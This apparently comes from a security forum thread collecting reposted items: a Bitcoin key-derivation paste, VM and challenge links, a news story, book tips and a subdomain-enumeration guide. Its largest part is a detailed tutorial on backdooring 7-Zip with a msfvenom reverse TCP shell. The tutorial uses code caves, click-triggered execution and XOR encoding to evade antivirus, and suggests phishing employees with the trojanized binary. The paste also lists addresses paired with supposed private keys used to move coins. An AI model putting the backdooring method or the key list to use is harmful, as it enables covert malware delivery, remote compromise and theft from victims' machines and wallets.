Sha256(1CVunYyUpeCFcGAYdHrDNrXcQFBVU8gyo9) 1KiGdZ9TUeWyJ3DyHj7LQLZgjvMHd6j2DZ Sha256(18SV4DVmytRDYB5JBAFkewUbVAp6FRpi5c) 13FzEhD3WpX682G7b446NFZV6TXHH7BaQv Sha256(1E1rSGgugyNYF3TTr12pedv4UHoWxv5CeD) 1LVRWmpfKKcRZcKvi5ZGWGx5wU1HCNEdZZ Sha256(1CVPe9A5xFoQBEYhFP46nRrzf9wCS4KLFm) 1HhNZhMm4YFPSFvUXE6wLYPx63BF7MRJCJ Sha256(145Sph2eiNGp5WVAkdJKg9Z2PMhTGSS9iT) 1G6qfGz7eVDBGDJEy6Jw6Gkg8zaoWku8W5 Sha256(18EF7uwoJnKx7YAg72DUv4Xqbyd4a32P9f) 1MNhKuKbpPjELGJA5BRrJ4qw8RajGESLz6 Sha256(15WLziyvhPu1qVKkQ62ooEnCEu8vpyuTR5) 18XAotZvJNoaDKY7dkfNHuTrAzguazetHE Sha256(15SP99eiBZ43SMuzzCc9AaccuTxF5AQaat) 1HamTvNJfggDioTbPgnC2ujQpCj4BEJqu Sha256(14nuZCWe76kWigUKAjFxyJLFHQyLTsKXYk) 17iqGkzW5Y7miJjd5B2gP5Eztx8kcCDwRM Sha256(1MB3L1eTnHo1nQSN7Lmgepb7iipWqFjhYX) 15M7QfReFDY2SZssyBALDQTFVV1VDdVBLA Sha256(16bjY7SynPYKrTQULjHy8on3WENxCmK4ix) 1LgwKwv9kt8BwVvn6bVWj8KcqpP9JSP1Mh Sha256(1Q81rAHbNebKiNH7HD9Mh2xtH6jgzbAxoF) 1pmZwNDZjpuAqW3LjYYQCEjbQYBtSxzWc Sha256(13PctMqzyBKi5CpZnbastHQURrSRrow4yj) 1qA59Na3WysruJbCPoomryDRCtJ4f4aLu Sha256(1HBsFJ9VngvMjaKZjbFhNRaegkjF9NBEe) 19QBydCuMiY7aRTbkP2tb3KQJUWkTrr5Xi Sha256(1JwSSubhmg6iPtRjtyqhUYYH7bZg3Lfy1T) 11EuerTwe9rxtT3T56ykX5K7J3AksPzU3 Sha256(14PnZgX8ZDABJZ8RnatkK7DQzdpkwRRPX2) 13JNB8GtymAPaqAoxRZrN2EgmzZLCkbPsh Sha256(1LGUyTbp7nbqp8NQy2tkc3QEjy7CWwdAJj) 1Ads6ZWgRbjSCZ37FUqcmk82gvup1gQurB Sha256(1NbBTJQ5azGEA1yhGnLh39fE8YoEbePpCm) 1LWU4SbnqnfctAMbtivp2L98i8hSSCm7u7 Sha256(1MVqDAJo8kbqKfTJWnbuzvfmiUXXBAmX3y) 12B1bUocw8rQefDcYNdckfSLJ6BsUwhRjT Sha256(1Pjg628vjMLBvADrPHsthtzKiryM2y46DG) 12GZz1D1kdX3Fj7M87RFvqubam8iGrK77R Sha256(1Lu49ZKmGoYmW1ji3SEqCGVyYfEw7occ86) 13wY5CtwQhd7LYprEpFpkt1g9R7ErMkAwT Sha256(1NPSWKXdnHa17NWTU3J6nVkyogZjmAh7N6) 1Kc324Y6UUMffeYdtuXgzVC28Kx3U8cqQk Sha256(1HAQB99WfrV2ttRjttUPMzRi4R1uC2ftMy) 1Gwz14Cty45h3hZ4nCEno6jSdxtQn5bc7h Sha256(1PDgY5PkpBNCZVWKKAq3cbGyqvwwN91z4g) 1L2a5n9ar7e2v3Wz6NDFnxisigvR6urGaY Sha256(1KxUVU9DKfdaTLMnXBLS5BZRf56cFnRosk) 1KwUfu3gGk7n8Wz969tAztvvM4Mp4ZY57s Sha256(12XuaKzEheWbFJBno9QiV6kPCWrnWpUYTK) 13JNB8GtymAPaqAoxRZrN2EgmzZLCkbPsh Sha256(1LGUyTbp7nbqp8NQy2tkc3QEjy7CWwdAJj) 12fcWddtXyxrnxUn6UdmqCbSaVsaYKvHQp Sha256(16SH69WgJCXYXWV58sxjTxonhgBh5HCZTt) 1MkaTR3642ofrstePom5bbwGHbuQJmrnGD Sha256(1BynBc2YUAoNcvZLWi24URzMvsk7CUe2rc) 114LdauSAu2FTaR2ChPsPTRRhjYD9PZzn2 Sha256(144BV4Y7tgnetk5tDKAYTGS4mjprA75zJz) 1NzWscae8v3sKmTVJYwq8yhkizK8hUS5qP Sha256(1ENCBKFsqxJVCqR2TS1WfDV3rDi6zA8J6Y) 1FjEL7TBazaJN7WyND4uwq9wiaWDzfizkP Sha256(1PeCGFsJgqz8CcjGugGq5bPBiRDXUZHLUH) 1FP8j4zUPoJkpKwYpd8zYGHVaKygRHzx3d Sha256(1ERdvKTCxP1gZvdNndLKtYotW7qpR3xhuQ) 16nXouTPm5gVedr4Betb8KRWLSBtmXGUbD Sha256(16oTV1jZPJ5wm3QLhN96xVF7DchihmpL1k) 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit Sha256(1Ca15MELG5DzYpUgeXkkJ2Lt7iMa17SwAo) My bot moved coins from the last two addresses only. (No one has claimed ownership from 16nX). All other transfers were the result of other people who either figured this out or are the ones who planted the bad addresses themselves (since 2014). And these are some recent examples of private keys that are based on other information from the blockchain itself (as stated, may be completely unrelated but still happening on a regular basis). 1LUqqMzaigWJTzaP79oxsD6zKGifokrh7p c193edeeb4e7fb5c3e01c3aebd2ec5ac13f349a5a78ca4112ab6a4cbf8e35404 txid 1FQ9AneLGfhFf9JT5m5sg5FaYFeJrGmJhS 00000000000000000045fa3492aee311171af6da7d05a76c6eaadab572dc1db9 Block Hash 1DhcPvYWBGwPFEsAJhXgdKtXX7FFGGeFVS 00000000839a8e6886ab5951d76f411475428afc90947ee320161bbf18eb6048 Block Hash 198MRUHD2cvgUTBKcnroqmoTSs4b8xyLH9 7dac2c5666815c17a3b36427de37bb9d2e2c5ccec3f8633eb91a4205cb4c10ff Markel Root 19FHVnoNYTmFAdC2VC7Az8TbCgrSWSP1ip 000000000000000000db717b4c076da2d1b9ff8ddbc94132e3a8d008a0fb62b9 Block Hash 1Lr2yEny7HYJkXdFgJ2D8zHyNH1uHMi4w4 2bedfd92a6136566bb858b2f0d223744a41a987c468356d069acc86f45bf68ac txid 1QBbjKxRk1jP36WYpFkJjgzhvVSDBMWjy2 f1599a1ced833d95a54aa38a1a64113d5f0a4db3cb613ef761180cab57155699 txid 1BFYNokepXjbb9Han2AGfSTNKNNU9vgAAn 533da7e41bd99550f63f152ef1e613f1a78e3bed12788664d536c6ec42b5e0aa txid 1MJtsgDNrrFWS3qxtrPr6BnQUdp1qPjyEm 216fb568589629b115b0ed8fc41fdf3219d9ab804c6ce5e53fbc581a88427c3f txid 14syDBvpGXS6PtWytkDJF2QACvSggEZ277 a7f4def1c7ff07d17b5dd58fc92f18ee2dbee6dc7654fd30a8653bd9d848f0a0 txid 1QBbjKxRk1jP36WYpFkJjgzhvVSDBMWjy2 f1599a1ced833d95a54aa38a1a64113d5f0a4db3cb613ef761180cab57155699 txid 1BkHAUcfrZLRLyXHiBn6XRoppPqSzuf8hE 805cd74ca322633372b9bfb857f3be41db0b8de43a3c44353b238c0acff9d523 txid 1CNgVFjAwHT7kc6uw7DGk42CXf1WbX4JQm 53d348ca871dc1205e778f4d8e66cfdadbd105782dba6688e9a0b4bdee4763e4 txid 1HjDAJiuJ8dda919xwKBqphhEwBVGfzMGt 0aad1b00a5227d9b03d33329a5a11af75c75c878a064c69b276063cbea677514 txid 1PDnrPSCw9eWTtJss4DhYoLTk4WUmZQdBi f87b08218888f97388218d3e2489962403f7eece98dd8b4733671edeb9ad1a7c txid 1MJp4z3ig498hNATfgHBAnLFhwoZpvw118 000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1b60a8ce26f Block Hash I think this information should be made public so that other backend systems plugged into crypto networks can guard against this sort of 'hide in plain sight' attack. As stated earlier, I honestly set out to look for buried treasure and stumbled upon someone else's exploit. Thanks to yt_coinartist's assistance in making this public. e8d064874c37ce44f13a880b93b548b83342c99e1530dd746322777f88397ed8 Going dark now....bye. Sursa: https://pastebin.com/jCDFcESz
  5. explainshell

  6. Table of Contents [hide] 1 Introduction 2 Self Imposed Restrictions 3 Methods used: 4 Criteria for PE file selection for implanting backdoor 4.1 ASLR: 4.2 Static Analysis 5 Backdooring PE file 6 Adding a new Section header method 6.1 Hijack Execution Flow 6.2 Adding Shellcode 6.3 Modifying shellcode 6.4 Spawning shell 6.5 Pros of adding a new section header method 6.6 Cons of adding a new section header method 7 Triggering shellcode upon user interaction + Codecaves 7.1 Code Caves 7.2 Triggering Shellcode Upon user interaction 7.3 Spawning Shell 8 Custom Encoding Shellcode 8.1 Spawning shell 9 Conclusion Introduction During Penetration testing engagement you are required to backdoor a specific executable with your own shellcode without increasing the size of the executable or altering its intended functionality and hopefully making it fully undetectable (FUD) how would you do it?. For example, after recon, you gather information that a lot number of employees use a certain “program/software”. The social engineering way to get in the victim’s network would be a phishing email to employees with a link to download “Updated version of that program”, which actually is the backdoored binary of the updated program. This post will cover how to backdoor a legitimate x86 PE (Portable Executable) file by adding our own reverse TCP shellcode without increasing the size or altering the functionality. Different techniques are also discussed on how to make the backdoor PE fully undetectable (FUD). The focus in each step of the process is to make the backdoored file Fully undetectable. The word “undetectable” here is used in the context of scan time static analysis. Introductory understanding of PE file format, x86 assembly and debugging required. Each section is building upon the previous section and no topic is repeated for the sake of conciseness, one should reference back and forth for clarity. Self Imposed Restrictions Our goal is to backdoor a program in a way that it becomes fully undetectable by anti viruses, and the functionality of the backdoored program should remain the same with no interruptions/errors. For anti-virus scanning purposes we will be using NoDistribute.There are a lot of way to make a binary undetectable, using crypters that encode the entire program and include a decoding stub in it to decode at runtime, compressing the program using UPX, using veil-framework or msfvenom encodings. We will not be using any of such tools. The purpose is to keep it simple and elegant! For this reason I have the following self imposed restrictions:- No use to Msfvenom encoding schemes, crypters, veil-framework or any such fancy tools. Size of the file should remain same, which means no extra sections, decoder stubs, or compressing (UPX). Functionality of the backdoored program must remain the same with no error/interruptions. Methods used: Adding a new section header to add shellcode User interaction based shellcode Trigger + codecaves. Dual code caves with custom encoder + triggering shellcode upon user interaction Criteria for PE file selection for implanting backdoor Unless you are forced to use a specific binary to implant a backdoor the following points must be kept in mind. They are not required to be followed but preferred because they will help reducing the AV detection rate and making the end product more feasible. The file size of executable should be small < 10mb, Smaller size file will be easy to transfer to the victim during a penetration testing engagement. You could email them in ZIP or use other social engineering techniques. It will also be convenient to debug in case of issues. Backdoor a well known product, for example Utorrent, network utilities like Putty, sysinternal tools, winRAR , 7zip etc. Using a known PE file is not required, but there are more chances of AV to flag an unknown PE backdoor-ed than a known PE backdoor-ed and the victim would be more inclined to execute a known program. PE files that are not protected by security features such as ASLR or DEP. It would be complicated to backdoor those and won’t make a difference in the end product compared to normal PE files. It is preferable to use C/C++ Native binaries. It is preferable to have a PE file that has a legitimate functionality of communicating over the network. This would fool few anti viruses upon execution when backdoor shellcode will make a reverse connection to our desired box. Some anti viruses would not flag and will consider it as the functionality of the program. Chances are network monitoring solutions and people would consider malicious communication as legitimate functionality. The Program we will be backdooring is 7Zip file archiver (GUI version). Firstly lets check if the file has ASLR enabled. ASLR: Randomizes the addresses each time program is loaded in memory, this way attacker cannot used harcoded addresses to exploit flaws/shellcode placement. Powershell script result shows no ASLR or DEP security mechanism As we can see in the above screenshot, not much in terms of binary protection. Lets take a look at some other information about the 7zip binary. Static Analysis Static Analysis of 7zip binary The PE file is 32 bit binary, has a size of about 5mb. It is a programmed in native code (C++). Seems like a good candidate for our backdoor. Lets dig in! Backdooring PE file There are two ways to backdoor Portable executable (PE) files. Before demonstrating both of them separately it is important to have a sense of what do we mean by backdooring a PE file?. In simple terms we want a legitimate windows executable file like 7zip achiever (used for demonstration) to have our shellcode in it, so when the 7zip file is executed our shellcode should get executed as well without the user knowing and without the anti viruses detecting any malicious behavior. The program (7zip) should work accurately as well. The shellcode we will be using is a stageless MSFvenom reverse TCP shell. Follow this link to know the difference between staged and stageless payloads Both of the methods described below has the same overall process and goal but different approaches to achieve it. The overall process is as follow:- Find an appropriate place in memory for implanting our shell code, either in codecaves or by creating new section headers, both methods demonstrated below. Copy the opcodes from stack at the beginning of program execution. Replace those instructions with our own opcodes to hijack the execution flow of the application to our desired location in memory. Add the shellcode to that memory location which in this case is stageless TCP reverse shell. Set the registers back to the stack copied in first step to allow normal execution flow. Adding a new Section header method The idea behind this method is to create a new header section in PE file, add our shellcode in newly created section and later point the execution flow it that section. The new section header can be created using a tool such as LordPE. Open Lord PE Go to section header and add the section header (added .hello) at the bottom. Add the Virtual size and Raw size 1000 bytes. Note that 1000 is in hexadecimal (4096 bytes decimal). Make the section header executable as we have to place our Shellcode in this section so it has to be executable, writable and readable. Save the file as original. Adding a new header section Now if we execute the file, it wont work because we have added a new section of 1000h bytes, but that header section is empty. Binary not executing because of empty header section To make to file work normally as intended, we have to add 1000h bytes at the end of the file because right now the file contains a header section of 1000 bytes but that section is empty, we have to fill it up by any value, we are filling it up by nulls (00). Use any hex editor to add 1000 hexademical bytes at the end of the file as shown below. Adding 1000h bytes at the end of the file We have added null values at the end of the file and renamed it 7zFMAddedSection.exe. Before proceeding further we have to make sure now our executable 7zFMAddedSection.exe, is working properly and our new section with proper size and permissions is added, we can do that in Ollydbg by going to memory section and double clicking PE headers. PE Headers in Ollydbg Hijack Execution Flow We can see that our new section .hello is added with designated permissions. Next step is to hijack the execution flow of the program to our newly added .hello section. When we execute the program it should point to .hello section of the code where we would place our shellcode. Firstly note down the first 5 opcodes, as will need them later when restoring the execution flow back. We copy the starting address of .hello section 0047E000 open the program in Ollydbg and replace the first opcode at address 004538D8 with JMP to 0047E000. Replacing the starting address with JMP to new section Right click -> Copy to executable -> all modifications -> Save file. We saved the file as 7zFMAddedSectionHijacked.exe (File names getting longer and we are just getting started!) Up-till now we have added a new header section and hijacked the execution flow to it. We open the file 7zFMAddedSectionHijacked.exe in Ollydbg. We are expecting execution flow to redirect to our newly added .hello section which would contain null values (remember we added nulls using hexedit?). Starting of .hello section Sweet! We have a long empty section .hello section. Next step is to add our shellcode from the start of this section so it gets triggered when the binary is executed. Adding Shellcode As mentioned earlier we will be using Metasploit’s stagless windows/shell_reverse_tcp shellcode. We are not using any encoding schemes provided by msfvenom, most of them if not all of them are already flagged by anti viruses. To add the shellcode firstly we need push registers on to the stack to save their state using PUSHAD and PUSHFD opcodes. At the end of shellcode we pop back the registers and restore the execution flow by pasting initial (Pre hijacked) program instructions copied earlier and jumping back to make sure the functionality of 7zip is not disturbed. Here is the sequence of instructions PUSHAD PUSHFD Shellcode.... POPAD POPFD Restore Execution Flow... We generate windows stageless reverse shellcode using the following arguments in mfsvenom msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=8080 -a x86 --platform windows -f hex Copy the shellcode and paste the hex in Ollydbg as right click > binary > binary paste , it will get dissembled to assembly code. Added shellcode at the start of .hello section Modifying shellcode Now that we have our reverse TCP shellcode in .hello section its time to save the changes to file, before that we need to perform some modifications to our shellcode. At the end of the shellcode we see an opcode CALL EBP which terminates the execution of the program after shellcode is executed, and we don’t want the program execution to terminate, infact we want the program to function normally after the shellcode execution, for this reason we have to modify the opcode CALL EBP to NOP (no operation). Another modification that needs to be made is due to the presence of a WaitForSingleObject in our shellcode. WaitForSignleObject function takes an argument in milliseconds and wait till that time before starting other threads. If the WaitForSignleObject function argument is -1 this means that it will wait infinite amount of time before starting other threads. Which simply means that if we execute the binary it will spawn a reverse shell but normal functionality of 7zip would halt till we close our reverse shell. This post helps in finding and fixing WaitForSignleObject. We simply need to modify opcode DEC INC whose value is -1 (Arugment for WaitForSignleObject) to NOP. Next we need to POP register values off the stack (to restore the stack value pre-shellcode) using POPFD and POPAD at the end of shellcode. After POPFD and POPAD we need to add the 5 hijacked instructions(copied earlier in hijack execution flow) back, to make sure after shellcode execution our 7zip program functions normally. We save the modifications as 7zFMAddedSectionHijackedShelled.exe Spawning shell We setup a listener on Kali Box and execute the binary 7zFMAddedSectionHijackedShelled.exe. We get a shell. 7zip binary works fine as well with no interruption in functionality. We got a shell! How are we doing detection wise? Detection Rate Not so good!. Though it was expected since we added a new writeable, executable section in binary and used a known metasploit shellcode without any encoding. Pros of adding a new section header method You can create large section header. Large space means you don’t need to worry about space for shellcode, even you can encode your shellcode a number of times without having to worry about its size. This could help bypassing Anti viruses. Cons of adding a new section header method Adding a new section header and assigning it execution flag could alert Anti viruses. Not a good approach in terms of AV detection rate. It will also increase the size of original file, again we wouldn’t want to alert the AV or the victim about change of file size. High detection rate. Keeping in mind the cons of new section header method. Next we will look at two more methods that would help help us achieve usability and low detection rate of backdoor. Triggering shellcode upon user interaction + Codecaves What we have achieved so far is to create a new header section, place our shellcode in it and hijack the execution flow to our shellcode and then back to normal functionality of the application. In this section we will be chaining together two methods to achieve low detection rate and to mitigate the shortcomings of new adder section method discussed above. Following are the techniques discussed:- How to trigger our shellcode based on user interaction with a specific functionality. How to find and use code caves. Code Caves Code caves are dead/empty blocks in a memory of a program which can be used to inject our own code. Instead of creating a new section, we could use existing code caves to implant our shellcode. We can find code caves of different sizes in almost of any PE. The size of the code cave does matter!. We would want a code cave to be larger than our shellcode so we could inject the shellcode without having to split it in smaller chunks. The first step is to find a code cave, Cave Miner is an optimal python script to find code caves, you need to provide the size of the cave as a parameter and it will show you all the code caves larger than that size. finding code caves for injection We got two code caves larger than 700 bytes, both of them contain enough space for our shellcode. Note down the virtual address for both caves. Virtual address is the starting address of the cave. Later We will hijack the execution flow by jumping to the virtual addresses. We will be using both caves later, for now, we only require one cave to implant in our shellcode. We can see that the code cave is only readable, we have to make it writable and executable for it to execute our shellcode. We do that with LORDPE. Making .rsrc writeable and executable Triggering Shellcode Upon user interaction Now that we have a code cave we can jump to, we need to find a way to redirect execution flow to our shellcode upon user interaction. Unlike in the previous method, we don’t want to hijack the execution flow right after the program is run. We want to let the program run normally and execute shellcode upon user interaction with a specific functionality, for example clicking a specific tab. To accomplish this we need to find reference strings in the application. We can then hijack the address of a specific reference string by modifying it to jump to code cave. This means that whenever a specific string is accessed in memory the execution flow will get redirected to our code cave. Sounds good? Let see how do we achieve this. Open the 7zip program in Ollydbg > right click > search for > all reference text strings Found a suitable reference string In reference strings we found an interesting string, a domain (http://www.7-zip.org). The memory address of this domain gets accessed when a user clicks on about > domain. Website button functionality Note that we can have multiple user interaction triggers that can be backdoored in a single program using the referenced strings found. For the sake of an example we are using the domain button on about page which upon click opens the website www.7-zip.org in browser. Our objective is to trigger shellcode whenever a user clicks on the domain button. Now we have to add a breakpoint at the address of domain string so that we can then modify its opcode to jump to our code cave when a user clicks on the website button.We copy the address of domain string 0044A8E5 and add a breakpoint. We then click on the domain button in the 7zip program. The execution stops at the breakpoint as seen in the below screenshot:- Execution stops at break point address 0044A8E5 (http;//www.7zip.org/) now we can modify this address to jump to code cave, so when a user clicks on the website button execution flow would jump to our code cave, where in next step we will place our shellcode. Firstly we copy couple of instructions after 0044A8E5 address as they will be used again when we want to point execution flow back to it after shellcode execution to make sure normal functionality of 7zip. inject backdoor into exe After modification to jmp 00477857 we save the executable as 7zFMUhijacked.exe . Note that the address 00477857 is the starting address of codecave 1. We load the 7zFMUhijacked.exe in Ollydbg and let it execute normally, we then click on the website button. We are redirected to an empty code cave. Nice! we have redirected execution flow to code cave upon user interaction. To keep this post concise We will be skipping the next steps of adding and modifying the shellcode as these steps are the same explained above “6.2 Adding shellcode” and “6.3 Modifying shellcode“. Spawning Shell We add the shellcode, modify it, restore the execution flow back to from where we hijacked it 0044A8E5 and save the file as 7zFMUhijackedShelled.exe. The shellcode used is stageless windows reverse TCP. We set a netcat listener, run 7zFMUhijackedShelled.exe , click on the website button. Fully Undetectable backdoor PE Files Everything worked as we expected and we got a shell back! . Lets see how are we doing detection wise? Triggering shellcode upon user interaction + Codecaves detection. Thats good! we are down from 16/36 to 3/38. Thanks to code caves and triggering shellcode upon user interaction with a specific functionality. This shows a weakness in detection mechanism of most anti viruses as they are not able to detect a known msfvenom shellcode without any encoding just because it is in a code cave and triggered upon user interaction with specific functionality. The detection rate 3/38 is good but not good enough (Fully undetectable). Considering the self imposed restrictions, the only viable route from here seem to do custom encoding of shellcode and decode it in memory upon execution. Custom Encoding Shellcode Building upon what we previously achieved, executing shellcode from code cave upon user interaction with a specific program functionality, we now want to encode the shellcode using XOR encoder. Why do we want to use XOR, a couple of reasons, firstly it is fairly easy to implement, secondly we don’t have to write a decoder for it because if you XOR a value 2 times, it gives you the original value. We will encode the shellcode with XOR once and save it on disk. Then we will XOR the encoded value again in memory at runtime to get back the original shellcode. Antiviruses wouldn’t be able to catch it because it is being done in memory! We require 2 code caves for this purpose. One for shellcode and one for encoder/decoder. In finding code caves section above we found 2 code caves larger than 700 bytes both of them have fair enough space for shellcode and encoder/decoder. Below is the flow chart diagram of execution flow. Custom encoding shellcode in code caves + Triggering shellode upon user interaction So we want to hijack the program execution upon user interaction of clicking on the domain button to CC2 starting address 0047972e which would contain the encoder/decoder XOR stub opcodes, it will encode/decode the shellcode that resides in CC1 starting address 00477857, after CC2 execution is complete we will jump to CC1 to start execution which would spawn back a shell, after CC2 execution we will jump back from CC2 to where we initially hijacked the execution flow with clicking the domain button to make sure the functionality of the 7zip program remains the same and the victim shouldn’t notice any interruptions. Sounds like a long ride, Lets GO! Note that the steps performed in the last section wouldn’t be repeated so reference back to hijacking execution upon user interaction, adding shellcode in codecaves, modifying shellcode and restoring the execution flow back to where we hijacked it. Firstly we Hijack the execution flow from address 0044A8E5 (clicking domain button) to CC2 starting address 0047972e and save the modifications as file on disk. We run the modified 7zip file in Ollydbg and trigger the hijacking process by clicking on the domain button. Hijacking execution flow to CC2 Now that we are in CC2, before writing our XOR encoder here, we will firstly jump to starting address of CC1 and implant our shellcode so that we get the accurate addresses that we have to use in XOR encoder. Note that the first step of hijacking to CC2 can also be performed at the end as well, as it won’t impact the overall execution flow illustrated in flowchart above. We jump to CC1 , implant, modify shellcode and restore the execution flow to 0044A8E5 from where we hijacked to CC2 to make sure smooth execution of 7zip program functionality after shellcode. Note that implanting, modifying shellcode and restoring execution flow is already explained in previous sections. Bottom of shellocode at CC1 Above screenshot shows the bottom of shellocode at CC1, note down the address 0047799B, this is where the shellcode ends, next instructions are for restoring the execution flow back. So we have to encode from starting of the shellcode at address 00477859 till 0047799B. We move to 00477857 the starting address of CC2, we write XOR encoder, following are the opcodes for XOR encoder implementation. PUSH ECX, 00477857 // Push the starting address of shellcode to ECX. XOR BYTE PTR DS:[EAX],0B // Exclusive OR the contents of ECX with key 0B INC ECX // Increase ECX to move to next addresses CMP ECX,0047799B // Compare ECX with the ending address of shellcode JLE SHORT 00479733 // If they are not equal, take a short jump back to address of XOR operation JMP 7zFM2.00477857 // if they are equal jump to the start of shellcode As we are encoding the opcodes in CC1, we have to make sure the header section in which the CC1 resides is writeable otherwise Ollydbg will show access violation error. Refer back to codecaves section to know how to make it writable and executable. We add a breakpoint at JMP 7zFM2.00477857 after the encoding is performed and we are about to jump back to encoded shellcode. If we go back to CC1 we will see that out shellcode is encoded now. Custom encode shellcode in memory All is left to save the modifications of both the shellcode at CC1 and the encoder at CC2 to a file we named it as 7zFMowned.exe. Lets see if its working as intended. Spawning shell We setup a listener on port 8080 on our Kali box, run 7zFMbackdoored.exe in windows and click on domain button . 7zip website pops up in the browser and if we go back to our kali box. We got a shell How are we doing detection wise? Fully undetectable PE file using Dual code caves, custom encoder and trigger upon user interaction Conclusion Great! we have achieved fully undetectable backdoor PE file that remains functional with the same size. Sursa: https://haiderm.com/fully-undetectable-backdooring-pe-files/
  7. Windows 10 Enterprise (Evaluation - Build 201710) 20 GB download This VM will expire on 1/15/18. We currently package our virtual machines for four different virtualization software options: VMWare, Hyper-V, VirtualBox, and Parallels. This evaluation virtual machine includes: Windows 10 Fall Creators Update Enterprise Evaluation Visual Studio 2017 (Build 15.4) with the UWP, desktop C++, and Azure workflows enabled Windows developer SDK and tools (Build 16299.15, installed as part of VS UWP workflow) Windows UWP samples (Latest) Windows Subsystem for Linux enabled Developer mode, Bash on Ubuntu on Windows, and containers enabled The Microsoft Software License Terms for the Windows 10 VMs supersede any conflicting Windows license terms included in the VMs. Link: https://developer.microsoft.com/en-us/windows/downloads/virtual-machines
  8. Welcome to the 2017 Codebreaker Challenge! To get started, register for an account using your .edu email address. Then, visit the Challenge page to receive your instructions for starting on the first task in the challenge. For information on reverse engineering and for some tips on how to get started, check out the Resources page. Good luck! Link: https://codebreaker.ltsnet.net/home
  9. The world's first human head transplant has been carried out on a corpse in China, according to Italian professor Sergio Canavero. During an 18-hour operation, experts demonstrated that it is possible to successfully reconnect the spine, nerves and blood vessels of a severed head. Professor Canavero, director of the Turin Advanced Neuromodulation Group, made the announcement at a press conference in Vienna this morning. The procedure was carried out by a team led by Dr Xiaoping Ren, who last year grafted a head onto the body of a monkey. A full report of the Harbin Medical University team's procedure and a timeframe for the live transplant are expected within the next few days. Speaking at the press conference, Professor Canavero said: 'For too long nature has dictated her rules to us. 'We're born, we grow, we age and we die. For millions of years humans has evolved and 110 billion humans have died in the process. 'That's genocide on a mass scale. 'We have entered an age where we will take our destiny back in our hands. 'It will change everything. It will change you at every level. 'The first human head transplant, in the human mode, has been realised. 'The surgery lasted 18 hours. The paper will be released in a few days.' 'Everyone said it was impossible, but the surgery was successful.' Professor Canavero added that the team's next step is to perform a full head swap between brain dead organ donors. Sursa & articol complet: http://www.dailymail.co.uk/sciencetech/article-5092769/World-s-human-head-transplant-carried-out.html
  10. Carti de criptografie

    poti incepe cu: Istoria codurilor secrete - Laurent Joffrin (foarte "readable", la sfarsitul fiecarui capitol vei avea de "spart" cate ceva) poti incerca si The Codebreakers - Kahn David (history of cryptography from ancient Egypt to the time of its writing) https://www.coursera.org/learn/crypto (ai sa intelegi de ce ti l-am recomandat) https://cryptopals.com/ ca sa nu mai ai timp liber
  11. Fun stuff

    care ceasca se umple prima? ( @aelius )
  12. As a penetration tester or a bug bounty hunter, most of the times you are given a single domain or a set of domains when you start a security assessment. You’ll have to perform extensive reconnaissance to find interesting assets like servers, web applications, domains that belong to the target organisation so that you can increase your chances of finding vulnerabilities. We wrote an extensive blog post on Open Source Intelligence Gathering techniques that are typically used in the reconnaissance phase. Sub-domain enumeration is an essential part of the reconnaissance phase. This blog post covers various sub-domain enumeration techniques in a crisp and concise manner. A gitbook will be released as a follow up for this blog post on the same topic where we cover these techniques in-depth. We covered some of these techniques in the “Esoteric sub-domain enumeration techniques” talk given at Bugcrowd LevelUp conference 2017. What is sub-domain enumeration? Sub-domain enumeration is the process of finding sub-domains for one or more domain(s). It is an essential part of the reconnaissance phase. Why sub-domain enumeration? Sub-domain enumeration can reveal a lot of domains/sub-domains that are in scope of a security assessment which in turn increases the chances of finding vulnerabilities Finding applications running on hidden, forgotten sub-domains may lead to uncovering critical vulnerabilities Often times the same vulnerabilities tend to be present across different domains/applications of the same organization The famous Yahoo! Voices hack happened due to a vulnerable application deployed on a yahoo.com sub-domain Sub-domain enumeration techniques 1. Search engines like Google and Bing supports various advanced search operators to refine search queries. These operators are often referred to as “Google dorks”. We can use “site:” operator in Google search to find all the sub-domains that Google has found for a domain. Google also supports additional minus operator to exclude sub-domains that we are not interested in “site:*.wikimedia.org -www -store -jobs -uk” Using site operator in Google search to find sub-domains Bing search engine supports some advanced search operators as well. Like Google, Bing also supports a “site:” operator that you might want to check for any additional results apart from the Google search Finding sub-domains using “site:” operator in Bing 2. There are a lot of the third party services that aggregate massive DNS datasets and look through them to retrieve sub-domains for a given domain. VirusTotal runs its own passive DNS replication service, built by storing DNS resolutions performed when visiting URLs submitted by users. In order to retrieve the information of a domain you just have to put domain name in the search bar Searching for sub-domains using virustotal sub-domains found using VirusTotal DNSdumpster is another interesting tools that can find potentially large number of sub-domains for a given domain Searching for sub-domains using DNSdumpster Sublist3r is a popular tool that’ll enumerate sub-domains using various sources. Sublist3r enumerates sub-domains using many search engines such as Google, Yahoo, Bing, Baidu, and Ask. Sublist3r also enumerates sub-domains using Netcraft, Virustotal, ThreatCrowd, DNSdumpster, and ReverseDNS. sub-domain enumeration using Sublist3r 3. Certificate Transparency(CT) is a project under which a Certificate Authority(CA) has to publish every SSL/TLS certificate they issue to a public log. An SSL/TLS certificate usually contains domain names, sub-domain names and email addresses. This makes them a treasure trove of information for attackers. I wrote a series of technical blog posts on Certificate Transparency where I covered this technique in-depth, you can read the series here. The easiest way to lookup certificates issued for a domain is to use search engines that collect the CT logs and let’s anyone search through them. Few of the popular ones are listed below - https://crt.sh/ https://censys.io/ https://developers.facebook.com/tools/ct/ https://google.com/transparencyreport/https/ct/ Finding sub-domains of an organisation’s primary domain using crt.sh We wrote few scripts to simplify the process of finding sub-domains using CT log search engines. The scripts are available in our github repo — https://github.com/appsecco/bugcrowd-levelup-subdomain-enumeration Interesting sub-domain entry from CT logs for uber.com The downside of using CT for sub-domain enumeration is that the domain names found in the CT logs may not exist anymore and thus they can’t be resolved to an IP address. You can use tools like massdns in conjunction with CT logs to quickly identify resolvable domain names. # ct.py - extracts domain names from CT Logs(shipped with massdns) # massdns - will find resolvable domains & adds them to a file ./ct.py icann.org | ./bin/massdns -r resolvers.txt -t A -q -a -o -w icann_resolvable_domains.txt - Using massdns to find resolvable domain names 4. Dictionary based enumeration is another technique to find sub-domains with generic names. DNSRecon is a powerful DNS enumeration tool, one of it’s feature is to conduct dictionary based sub-domain enumeration using a pre-defined wordlist. $ python dnsrecon.py -n ns1.insecuredns.com -d insecuredns.com -D subdomains-top1mil-5000.txt -t brt Dictionary based enumeration using DNSRecon 5. Permutation scanning is another interesting technique to identify sub-domains. In this technique, we identify new sub-domains using permutations, alterations and mutations of already known domains/sub-domains. Altdns is a tool that allows for the discovery of sub-domains that conform to patterns $ python altdns.py -i icann.domains -o data_output -w icann.words -r -s results_output.txt Finding sub-domains that match certain 